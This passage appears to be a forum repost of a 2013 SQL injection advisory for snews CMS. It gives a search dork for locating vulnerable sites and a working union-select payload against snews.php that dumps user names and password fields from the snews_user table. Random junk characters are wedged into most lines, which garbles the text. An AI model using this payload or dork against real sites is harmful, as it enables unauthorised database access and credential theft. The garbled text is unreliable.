标题: CMS snews SQL Injection Vulnerability
# r" n3 u0 ]+ z8 b" Z作者: By onestree
3 X2 E9 X/ h' m0 ?$ ?下载地址 : http://snewscms.com/
$ U/ ?! O* H& h测试平台 : ubuntu 12.10 / win 7
) V& m( F% o( T% S+ I$ X9 T关键词: inurl:"tanyakan pada rumput yang bergoyang"9 \8 L" i: g9 X7 K8 V
+ ?# K; Z }% W/ d) u+ e. o6 k$ `8 S8 a9 W
+ k+ i0 C' j: S" Y*************************************************************+ G, ?. p$ Q' u9 P1 L6 ]
- e$ r! E2 \# K% z3 @# S
SQL poc:
# Z$ d; Q. D$ J4 m: O0 p( j
2 ?7 R% Y: N% q2 m: uhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
1 O" D/ \0 L) T9 ~3 [* {" t/ X- w
! J$ V% G' ~8 M0 T示例
7 K# b9 s/ s: ]! H7 h' B' | 5 {: }1 ?! b+ x& J2 B
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*2 f) d$ {) I8 `+ l- r
% d7 J6 n+ t; Y* D: k5 c! m
% f; E* M' ~8 A# s1 B: m3 s& w* i致谢:
- h2 J1 [! C: S# P# f5 }' `
$ q1 X$ L* p( W0 _ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell# @, Y$ n2 z& C$ J& X# T7 B
6 T. l1 B/ E. q: L! h, d' [6 `
indonesiancoder - moeslimh4x0r - go-coder" ]3 P0 @5 y9 E. _. V3 t" ]
! ~5 i. Q! z) `- B1 `, w0 zspesial my hunny :*! |; J+ q/ K2 V' W( b" ], v" n4 Y) L
|
发表于 2013-1-23 08:55:06
收藏
支持
反对